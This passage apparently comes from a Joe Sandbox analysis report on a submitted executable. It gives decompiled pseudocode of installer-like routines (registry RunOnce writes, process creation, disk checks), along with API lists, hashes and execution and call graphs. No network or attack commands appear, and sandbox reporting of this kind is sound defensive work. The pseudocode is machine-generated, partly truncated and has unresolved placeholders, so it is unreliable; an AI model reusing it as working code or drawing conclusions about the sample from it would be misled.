                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                     Address column (one address per line of the C code above): 0x0039368c 0x0039368f 0x00393691 0x0039369f 0x003936a7 0x00000000 0x00000000 0x003936ba 0x00000000 0x003936bc 0x003936bc 0x003936c0 0x003936cb 0x003936c2 0x003936c4 0x003936c4 0x003936da 0x003936e0 0x003936e6 0x00000000 0x00000000 0x003936e6 0x00000000 0x003936ba 0x003936ed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0039369F
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936B2
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 003936CB
                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003936DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                    • Opcode ID: 3c0557d32a6eb058825b8eda7c14670189f767ace5c369c417c2304833f4f80f
                                                                                                                                                                                                    • Instruction ID: b0e825f1ab04507fb8c8e6082331b691dce0523480d2c1cd635cb2d791d21b64
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c0557d32a6eb058825b8eda7c14670189f767ace5c369c417c2304833f4f80f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 440167B290025577DF314BA65C88EEB767CEBC5B10F15021AF915E2184D561CA44C6A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E003965E8(char* __ecx) {
                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                     Address column (one address per line of the C code above, listing truncated): 0x003965e8 0x003965ed 0x003965ef 0x003965f2 0x003965f4 0x003965f4 0x003965f6 0x003965f7 0x00396608 0x00396611 0x00396618 0x0039661c 0x00000000 0x00000000 0x0039660e
                                                                                                                                                                                                    0x00396623
                                                                                                                                                                                                    0x00396625
                                                                                                                                                                                                    0x0039663b
                                                                                                                                                                                                    0x0039663b
                                                                                                                                                                                                    0x0039663d
                                                                                                                                                                                                    0x00396641
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396610
                                                                                                                                                                                                    0x00396644
                                                                                                                                                                                                    0x00396647
                                                                                                                                                                                                    0x00396647
                                                                                                                                                                                                    0x00396621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00392B33), ref: 00396602
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00396612
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00396629
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00396635
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                    • Opcode ID: dd83211fd273cb4489d0391e9a2e2e449d082913705d51ae52fd891d2fa870a5
                                                                                                                                                                                                    • Instruction ID: 92161ee78f418aa5b641127d46a3727e00c20deb8550037fd5f6db4204e07f50
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd83211fd273cb4489d0391e9a2e2e449d082913705d51ae52fd891d2fa870a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87F0C8324069506EEF331B299C88DBBBF9CDFC7365F2B02AFE4D692001D6560D4686A1
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
			E003969B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x3981f8 = E00396C70();
				__set_app_type(E00396FBE(2));
				 *0x3988a4 =  *0x3988a4 | 0xffffffff;
				 *0x3988a8 =  *0x3988a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x398528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x39851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00397000();
				if( *0x398000 == 0) {
					__setusermatherr(E00397000);
				}
				E003971EF(_t6);
				return 0;
			}
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00396FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00396FC5
                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 003969C2
                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 003969D8
                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 003969E6
                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00396A07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                    • Opcode ID: 4de4baf6fbc5953186dd0367fe7154995e2e6534b8a020f291ea0328f3e617eb
                                                                                                                                                                                                    • Instruction ID: f887825e8e0158f9eccf270c2cd26193ad7c8c0736c35b60dd67db5049122a92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4de4baf6fbc5953186dd0367fe7154995e2e6534b8a020f291ea0328f3e617eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F0F8B01197018FDB57AB34ED0A6043BA9FB86321F110A0BE4A28A2E1CF3B8555CA11
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
			E00396952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				char* _t6; // declaration was missing in the decompiler output; used below
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x395760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}
APIs
• GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W9,?,00000000,00395760,?,A:\), ref: 0039697F
• MulDiv.KERNEL32(?,?,00000400), ref: 00396999
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID: `W9
• API String ID: 1705453755-493441449
• Opcode ID: c90e9a44d79b056a79d643c5beae573a1a5704adcefca0047df3254a0f8647de
• Instruction ID: 26ea0990d1064fcdd96617f08ab266f4d91e98b973d3df4ccf1b7678631c997b
• Opcode Fuzzy Hash: c90e9a44d79b056a79d643c5beae573a1a5704adcefca0047df3254a0f8647de
• Instruction Fuzzy Hash: B9F097B6D11228BBDB12DFE88D45ADEBBBCEB48700F154297A510E6240D6719A058BD1
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 28.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 960
Total number of Limit Nodes: 24
2936->2950 2938 135057 2937->2938 2939 135029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 134efd 2938->2953 2939->2938 2942 135060 2944 1344b9 20 API calls 2942->2944 2943 13507c 2945 135075 2943->2945 2946 1344b9 20 API calls 2943->2946 2944->2945 2947 135110 FreeResource 2945->2947 2948 13511d 2945->2948 2946->2945 2947->2948 2949 13513a 2948->2949 2951 1344b9 20 API calls 2948->2951 2949->2950 2952 13514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 134f4a 2953->2954 2955 134980 25 API calls 2954->2955 2960 134fa1 2954->2960 2958 134f67 2955->2958 2956 136ce0 4 API calls 2957 134fc6 2956->2957 2957->2942 2957->2943 2959 134b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 132510 2961->2962 2963 13255b 2961->2963 2964 13658a CharPrevA 2962->2964 2965 136ce0 4 API calls 2963->2965 2966 132522 WritePrivateProfileStringA _lopen 2964->2966 2967 132569 2965->2967 2966->2963 2968 132548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 131b25 2969->2970 3074 131a84 2970->3074 2972 131b57 2973 13658a CharPrevA 2972->2973 2975 131b8c 2972->2975 2973->2975 2974 1366c8 2 API calls 2976 131bd1 2974->2976 2975->2974 2977 131d73 2976->2977 2978 131bd9 CompareStringA 2976->2978 2980 1366c8 2 API calls 2977->2980 2978->2977 2979 131bf7 GetFileAttributesA 2978->2979 2981 131d53 2979->2981 2982 131c0d 2979->2982 2983 131d7d 2980->2983 2984 131d64 2981->2984 2982->2981 2989 131a84 2 API calls 2982->2989 2985 131d81 CompareStringA 2983->2985 2986 131df8 LocalAlloc 2983->2986 2987 1344b9 20 API calls 2984->2987 2985->2986 2995 131d9b 2985->2995 2986->2984 2988 131e0b GetFileAttributesA 2986->2988 2990 131d6c 2987->2990 2991 131e1d 2988->2991 3008 131e45 2988->3008 2992 131c31 2989->2992 2994 136ce0 4 API calls 2990->2994 2991->3008 2993 131c50 LocalAlloc 2992->2993 2999 131a84 2 API calls 2992->2999 2993->2984 2996 131c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2998 131ea1 2994->2998 2995->2995 
3000 131dbe LocalAlloc 2995->3000 3002 131cf8 2996->3002 3007 131cc2 2996->3007 2998->2755 2999->2993 3000->2984 3003 131de1 3000->3003 3004 131d23 3002->3004 3005 131d09 GetShortPathNameA 3002->3005 3006 13171e _vsnprintf 3003->3006 3009 13171e _vsnprintf 3004->3009 3005->3004 3006->3007 3007->2990 3080 132aac 3008->3080 3009->3007 3011 13209a 3010->3011 3019 132256 3010->3019 3014 13171e _vsnprintf 3011->3014 3016 1320dc 3011->3016 3012 136ce0 4 API calls 3013 132263 3012->3013 3013->2755 3015 1320af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1320e4 RegCloseKey 3016->3017 3018 1320fb GetSystemDirectoryA 3016->3018 3017->3019 3020 13658a CharPrevA 3018->3020 3019->3012 3021 13211b LoadLibraryA 3020->3021 3022 132179 GetModuleFileNameA 3021->3022 3023 13212e GetProcAddress FreeLibrary 3021->3023 3025 1321de RegCloseKey 3022->3025 3028 132177 3022->3028 3023->3022 3024 13214e GetSystemDirectoryA 3023->3024 3026 132165 3024->3026 3024->3028 3025->3019 3027 13658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1321b7 LocalAlloc 3028->3029 3030 1321cd 3029->3030 3031 1321ec 3029->3031 3032 1344b9 20 API calls 3030->3032 3033 13171e _vsnprintf 3031->3033 3032->3025 3034 132218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 134016 CreateProcessA 3036->3037 3047 134106 3036->3047 3038 134041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 1340c4 3037->3039 3048 134070 3038->3048 3041 136285 GetLastError 3039->3041 3040 136ce0 4 API calls 3042 134117 3040->3042 3043 1340c9 GetLastError FormatMessageA 3041->3043 3042->2755 3045 1344b9 20 API calls 3043->3045 3045->3047 3046 134096 CloseHandle CloseHandle 3046->3047 3049 1340ba 3046->3049 3047->3040 3107 13411b 3048->3107 3049->3047 3051 1364c2 3050->3051 3052 13658a CharPrevA 3051->3052 3053 1364d8 GetFileAttributesA 3052->3053 3054 136501 LoadLibraryA 3053->3054 3055 1364ea 3053->3055 3057 136508 3054->3057 3055->3054 3056 1364ee LoadLibraryExA 3055->3056 3056->3057 3058 136ce0 4 API 
calls 3057->3058 3059 136513 3058->3059 3059->2785 3061 132381 3060->3061 3062 132289 RegOpenKeyExA 3060->3062 3063 136ce0 4 API calls 3061->3063 3062->3061 3064 1322b1 RegQueryValueExA 3062->3064 3065 13238c 3063->3065 3066 1322e6 memset GetSystemDirectoryA 3064->3066 3067 132374 RegCloseKey 3064->3067 3065->2760 3068 132321 3066->3068 3069 13230f 3066->3069 3067->3061 3071 13171e _vsnprintf 3068->3071 3070 13658a CharPrevA 3069->3070 3070->3068 3072 13233f RegSetValueExA 3071->3072 3072->3067 3075 131a9a 3074->3075 3077 131aba 3075->3077 3079 131aaf 3075->3079 3093 13667f 3075->3093 3077->2972 3078 13667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 132ad4 GetModuleFileNameA 3080->3081 3082 132be6 3080->3082 3092 132b02 3081->3092 3083 136ce0 4 API calls 3082->3083 3085 132bf5 3083->3085 3084 132af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 132b11 CharNextA CharUpperA 3089 132b8d CharUpperA 3086->3089 3086->3092 3087 132bca CharNextA 3088 132bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 132b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 1365e8 3092->3098 3094 136689 3093->3094 3095 1366a5 3094->3095 3096 136648 IsDBCSLeadByte 3094->3096 3097 136697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1365f4 3098->3099 3099->3099 3100 1365fb CharPrevA 3099->3100 3101 136611 CharPrevA 3100->3101 3102 13660b 3101->3102 3103 13661e 3101->3103 3102->3101 3102->3103 3104 136627 CharPrevA 3103->3104 3105 136634 CharNextA 3103->3105 3106 13663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3092 3108 134132 3107->3108 3110 13412a 3107->3110 3111 131ea7 3108->3111 3110->3046 3112 131eba 3111->3112 3113 131ed3 3111->3113 3114 13256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 131ff0 RegOpenKeyExA 3115->3116 3117 132026 3115->3117 3116->3117 3118 13200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3266 136a20 __getmainargs 3267 1319e0 3268 131a03 3267->3268 3269 131a24 
GetDesktopWindow 3267->3269 3270 131a20 3268->3270 3272 131a16 EndDialog 3268->3272 3271 1343d0 11 API calls 3269->3271 3274 136ce0 4 API calls 3270->3274 3273 131a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3270 3273->3270 3275 131a7e 3274->3275 3276 136bef _XcptFilter

Callgraph

Legend:
• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available
                                                                                                                                                                                                    callgraph 0 Function_00133210 23 Function_00134224 0->23 39 Function_0013597D 0->39 65 Function_0013658A 0->65 71 Function_001344B9 0->71 87 Function_001343D0 0->87 93 Function_001358C8 0->93 1 Function_00137010 2 Function_00135C17 3 Function_00136517 3->71 4 Function_0013411B 80 Function_00131EA7 4->80 5 Function_0013681F 100 Function_001366F9 5->100 106 Function_00136CE0 5->106 6 Function_0013171E 7 Function_0013621E 7->39 62 Function_00136285 7->62 7->71 7->106 8 Function_00132F1D 8->7 18 Function_00133A3F 8->18 22 Function_00133B26 8->22 46 Function_00135164 8->46 47 Function_00134169 8->47 48 Function_0013256D 8->48 8->62 8->65 8->71 74 Function_00133BA2 8->74 78 Function_001355A0 8->78 8->106 110 Function_001351E5 8->110 9 Function_00136C03 33 Function_0013724D 9->33 10 Function_00134702 59 Function_00131680 10->59 68 Function_001316B3 10->68 11 Function_00137000 12 Function_00134200 13 Function_00133100 13->87 14 Function_00137208 15 Function_0013490C 16 Function_00132630 16->71 16->106 17 Function_00134C37 18->3 18->62 67 Function_0013468F 18->67 18->71 19 Function_00136C3F 20 Function_00137120 21 Function_00136A20 22->3 55 Function_00136298 22->55 104 Function_00134FE0 22->104 23->59 23->71 24 Function_00136E2A 96 Function_00136CF0 24->96 25 Function_0013202A 25->6 25->65 25->71 25->106 26 Function_00136952 27 Function_00134A50 28 Function_00133450 28->87 29 Function_00137155 30 Function_00136F54 30->14 30->33 31 Function_00136F40 32 Function_00136648 34 Function_00132773 57 Function_00131781 34->57 34->59 34->65 34->106 35 Function_00137270 36 Function_00136C70 37 Function_0013487A 37->15 38 Function_0013667F 38->32 39->62 64 Function_0013268B 39->64 39->71 39->106 40 Function_00134B60 41 Function_00136A60 41->14 41->19 41->29 41->33 42 Function_00137060 41->42 
99 Function_00132BFB 41->99 42->1 42->20 43 Function_00136760 44 Function_00135467 44->39 44->57 44->59 44->62 44->65 76 Function_001353A1 44->76 44->93 44->106 45 Function_00132267 45->6 45->65 45->106 46->55 46->67 46->71 47->67 47->71 105 Function_001324E0 48->105 49 Function_0013476D 49->3 83 Function_001366AE 49->83 50 Function_00136793 51 Function_00132390 51->51 51->59 51->65 51->68 51->106 52 Function_00131F90 52->71 52->80 52->106 53 Function_00136495 53->57 53->65 53->106 54 Function_00134E99 54->59 55->6 55->106 56 Function_00135C9E 56->2 56->24 56->38 56->59 56->65 56->71 94 Function_001366C8 56->94 56->106 107 Function_001331E0 56->107 58 Function_00134980 58->37 58->71 59->57 60 Function_00133680 61 Function_00136380 63 Function_00131A84 63->38 64->6 64->71 64->106 65->68 66 Function_00132A89 68->57 69 Function_001369B0 69->11 69->36 72 Function_00136FBE 69->72 116 Function_001371EF 69->116 70 Function_001352B6 70->51 70->57 103 Function_00131FE1 70->103 70->106 114 Function_001365E8 70->114 71->5 71->6 71->59 92 Function_001367C9 71->92 71->106 72->30 73 Function_001318A3 73->106 119 Function_001317EE 73->119 74->25 74->45 74->53 74->57 74->62 74->67 74->71 74->106 112 Function_00131AE8 74->112 115 Function_00133FEF 74->115 75 Function_001372A2 76->6 76->59 76->65 76->106 77 Function_00136FA1 78->3 78->16 78->26 78->39 78->44 78->57 78->62 78->65 78->67 78->71 78->106 79 Function_00134CA0 80->48 81 Function_00136FA5 81->33 82 Function_00132CAA 82->3 82->51 82->56 82->67 82->71 82->73 82->106 118 Function_001336EE 82->118 84 Function_00132AAC 84->59 95 Function_001317C8 84->95 84->106 84->114 85 Function_00134AD0 85->60 86 Function_00134CD0 86->10 86->17 86->40 86->49 86->54 86->58 86->106 108 Function_001347E0 86->108 87->106 88 Function_00134CC0 89 Function_00134BC0 90 Function_001330C0 91 Function_001363C0 91->57 91->65 91->106 92->50 93->59 93->62 93->65 93->71 94->32 97 Function_001334F0 97->60 97->71 97->87 98 Function_00136EF0 99->8 99->52 
99->70 99->82 101 Function_001370FE 102 Function_00134EFD 102->40 102->58 102->106 104->67 104->71 104->102 105->65 105->106 106->96 108->59 108->71 109 Function_001319E0 109->87 109->106 110->62 110->67 110->71 111 Function_001370EB 112->6 112->57 112->59 112->63 112->65 112->68 112->71 112->84 112->94 112->106 113 Function_001328E8 113->34 113->66 115->4 115->62 115->71 115->106 117 Function_00136BEF 118->5 118->66 118->71 118->92 118->106 118->113 119->106

Control-flow Graph

Legend:
• Executed
• Not Executed
                                                                                                                                                                                                    control_flow_graph 36 133ba2-133bd9 37 133bdb-133bee call 13468f 36->37 38 133bfd-133bff 36->38 44 133d13-133d30 call 1344b9 37->44 45 133bf4-133bf7 37->45 40 133c03-133c28 memset 38->40 42 133d35-133d48 call 131781 40->42 43 133c2e-133c40 call 13468f 40->43 49 133d4d-133d52 42->49 43->44 54 133c46-133c49 43->54 56 133f4d 44->56 45->38 45->44 52 133d54-133d6c call 13468f 49->52 53 133d9e-133db6 call 131ae8 49->53 52->44 69 133d6e-133d75 52->69 53->56 67 133dbc-133dc2 53->67 54->44 58 133c4f-133c56 54->58 60 133f4f-133f63 call 136ce0 56->60 62 133c60-133c65 58->62 63 133c58-133c5e 58->63 65 133c67-133c6d 62->65 66 133c75-133c7c 62->66 64 133c6e-133c73 63->64 70 133c87-133c89 64->70 65->64 66->70 73 133c7e-133c82 66->73 71 133de6-133de8 67->71 72 133dc4-133dce 67->72 75 133d7b-133d98 CompareStringA 69->75 76 133fda-133fe1 69->76 70->49 78 133c8f-133c98 70->78 79 133f0b-133f15 call 133fef 71->79 80 133dee-133df5 71->80 72->71 77 133dd0-133dd7 72->77 73->70 75->53 75->76 81 133fe3 call 132267 76->81 82 133fe8-133fea 76->82 77->71 84 133dd9-133ddb 77->84 85 133cf1-133cf3 78->85 86 133c9a-133c9c 78->86 91 133f1a-133f1c 79->91 87 133fab-133fd2 call 1344b9 LocalFree 80->87 88 133dfb-133dfd 80->88 81->82 82->60 84->80 92 133ddd-133de1 call 13202a 84->92 85->53 90 133cf9-133d11 call 13468f 85->90 94 133ca5-133ca7 86->94 95 133c9e-133ca3 86->95 87->56 88->79 96 133e03-133e0a 88->96 90->44 90->49 98 133f46-133f47 LocalFree 91->98 99 133f1e-133f2d LocalFree 91->99 92->71 94->56 103 133cad 94->103 102 133cb2-133cc5 call 13468f 95->102 96->79 104 133e10-133e19 call 136495 96->104 98->56 106 133f33-133f3b 99->106 107 133fd7-133fd9 99->107 102->44 112 133cc7-133ce8 CompareStringA 102->112 103->102 113 133f92-133fa9 call 1344b9 104->113 114 133e1f-133e36 GetProcAddress 104->114 106->40 
107->76 112->85 118 133cea-133ced 112->118 125 133f7c-133f90 LocalFree call 136285 113->125 115 133f64-133f76 call 1344b9 FreeLibrary 114->115 116 133e3c-133e80 114->116 115->125 119 133e82-133e87 116->119 120 133e8b-133e94 116->120 118->85 119->120 123 133e96-133e9b 120->123 124 133e9f-133ea2 120->124 123->124 128 133ea4-133ea9 124->128 129 133ead-133eb6 124->129 125->56 128->129 131 133ec1-133ec3 129->131 132 133eb8-133ebd 129->132 133 133ec5-133eca 131->133 134 133ece-133eec 131->134 132->131 133->134 137 133ef5-133efd 134->137 138 133eee-133ef3 134->138 139 133f40 FreeLibrary 137->139 140 133eff-133f09 FreeLibrary 137->140 138->137 139->98 140->99
C-Code - Quality: 82%

E00133BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x138004; // 0xe764604f
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x139124 =  *0x139124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x138a28 - _t153; // 0x0
	if(_t165 != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                    						if( *0x138c42 != 0) {
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E0013468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0x139124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
